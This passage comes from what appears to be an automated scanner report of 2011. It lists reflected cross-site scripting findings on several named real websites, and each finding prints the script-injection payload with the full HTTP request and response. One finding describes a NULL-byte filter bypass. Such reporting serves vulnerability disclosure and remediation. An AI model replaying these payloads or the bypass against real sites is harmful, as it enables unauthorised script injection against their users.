...[SNIP]...

1.16. http://www.fusemail.com/products/spam-and-virus-filtering/request-more-information/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fusemail.com
Path:	/products/spam-and-virus-filtering/request-more-information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bee2a'><script>alert(1)</script>725db01c0f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bee2a\\\'><script>alert(1)</script>725db01c0f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&bee2a'><script>alert(1)</script>725db01c0f4=1 HTTP/1.1
Host: www.fusemail.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
X-Pingback: http://www.fusemail.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 27374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method='post' enctype='multipart/form-data' id='gform_7' action='/products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&bee2a\\\'><script>alert(1)</script>725db01c0f4=1'>
...[SNIP]...

1.17. http://www.govinfosecurity.com/articles.php [art_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.govinfosecurity.com
Path:	/articles.php

Issue detail

The value of the art_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88745"-alert(1)-"cc145464d1f was submitted in the art_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles.php?art_id=406788745"-alert(1)-"cc145464d1f HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Connection: close
Content-Type: text/html
Content-Length: 77596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
(function (JQ1) {
   JQ1("a#my-link-popup1").click(function () {
       JQ1.floatbox({
           ajax: {
               url: "http://www.govinfosecurity.com/popup.php?rdu=http://www.govinfosecurity.com/articles.php?art_id=406788745"-alert(1)-"cc145464d1f", // request url
               params: "", //post parameters
               before: "<p align='center'>
...[SNIP]...

1.18. http://www.govinfosecurity.com/articles.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.govinfosecurity.com
Path:	/articles.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be59"-alert(1)-"5e980f04183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles.php?art_id=4067&3be59"-alert(1)-"5e980f04183=1 HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Connection: close
Content-Type: text/html
Content-Length: 94708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
function (JQ1) {
   JQ1("a#my-link-popup1").click(function () {
       JQ1.floatbox({
           ajax: {
               url: "http://www.govinfosecurity.com/popup.php?rdu=http://www.govinfosecurity.com/articles.php?art_id=4067&3be59"-alert(1)-"5e980f04183=1", // request url
               params: "", //post parameters
               before: "<p align='center'>
...[SNIP]...

1.19. http://www.govinfosecurity.com/articles.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.govinfosecurity.com
Path:	/articles.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ceb4a'><script>alert(1)</script>ae00085e7e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles.php?art_id=4067&ceb4a'><script>alert(1)</script>ae00085e7e2=1 HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Connection: close
Content-Type: text/html
Content-Length: 94603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type='hidden' name='redirectTo' value='http://www.govinfosecurity.com/articles.php?art_id=4067&ceb4a'><script>alert(1)</script>ae00085e7e2=1'>
...[SNIP]...

1.20. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [contactFirstName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The value of the contactFirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a395b"><script>alert(1)</script>b302652662e was submitted in the contactFirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434a395b"><script>alert(1)</script>b302652662e&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAns
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:50 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="contactFirstName" value="23434a395b"><script>alert(1)</script>b302652662e" size="30" maxlength="30" tabindex="6"/>
...[SNIP]...

1.21. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [contactLastName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The value of the contactLastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71713"><script>alert(1)</script>5f59f30b6ec was submitted in the contactLastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=23423471713"><script>alert(1)</script>5f59f30b6ec&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbo
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:52 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="contactLastName" value="23423471713"><script>alert(1)</script>5f59f30b6ec" size="30" maxlength="30" tabindex="7"/>
...[SNIP]...

1.22. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [emailAddress parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The value of the emailAddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754ec"><script>alert(1)</script>e9c997c9693 was submitted in the emailAddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465754ec"><script>alert(1)</script>e9c997c9693&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:56 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="emailAddress" value="46465754ec"><script>alert(1)</script>e9c997c9693" size="32" maxlength="128" tabindex="12"/>
...[SNIP]...

1.23. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [merchantName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The value of the merchantName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d284"><script>alert(1)</script>f9b1a2c229e was submitted in the merchantName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=2342347d284"><script>alert(1)</script>f9b1a2c229e&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+na
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:47 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="merchantName" value="2342347d284"><script>alert(1)</script>f9b1a2c229e" size="48" maxlength="48" tabindex="1"/>
...[SNIP]...

1.24. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [passwordValue parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The value of the passwordValue request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2158"><script>alert(1)</script>bc4664158db was submitted in the passwordValue parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456ale2158"><script>alert(1)</script>bc4664158db&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:53 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="password" name="passwordValue" value="123456ale2158"><script>alert(1)</script>bc4664158db" size="32" maxlength="32" tabindex="10"/>
...[SNIP]...

1.25. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [passwordValueConfirm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The value of the passwordValueConfirm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae3ca"><script>alert(1)</script>82329d9dd11 was submitted in the passwordValueConfirm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456alae3ca"><script>alert(1)</script>82329d9dd11&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:55 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="password" name="passwordValueConfirm" value="123456alae3ca"><script>alert(1)</script>82329d9dd11" size="32" maxlength="32" tabindex="11"/>
...[SNIP]...

1.26. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [phoneNumber parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The value of the phoneNumber request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df5d5"><script>alert(1)</script>3c595ba12de was submitted in the phoneNumber parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456df5d5"><script>alert(1)</script>3c595ba12de&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:57 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="phoneNumber" value="46456df5d5"><script>alert(1)</script>3c595ba12de" size="24" maxlength="24" tabindex="13"/>
...[SNIP]...

1.27. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [salutation parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The value of the salutation request parameter is copied into the HTML document as plain text between tags. The payload %0068c91<script>alert(1)</script>098861a2c93 was submitted in the salutation parameter. This input was echoed as 68c91<script>alert(1)</script>098861a2c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.%0068c91<script>alert(1)</script>098861a2c93&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+firs
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:49 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<option>Mr..68c91<script>alert(1)</script>098861a2c93</option>
...[SNIP]...

1.28. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [securityAnswer parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doRegisterUser

Issue detail

The value of the securityAnswer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b33a2"><script>alert(1)</script>9812603d467 was submitted in the securityAnswer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456b33a2"><script>alert(1)</script>9812603d467&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:58 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="securityAnswer" value="546456b33a2"><script>alert(1)</script>9812603d467" size="56" maxlength="64" tabindex="19"/>
...[SNIP]...

1.29. http://www.seeos.com/tg.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.seeos.com
Path:	/tg.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4af94'%3balert(1)//b211e4f043c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4af94';alert(1)//b211e4f043c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tg.php?uid=8/4af94'%3balert(1)//b211e4f043c9d07 HTTP/1.1
Host: www.seeos.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
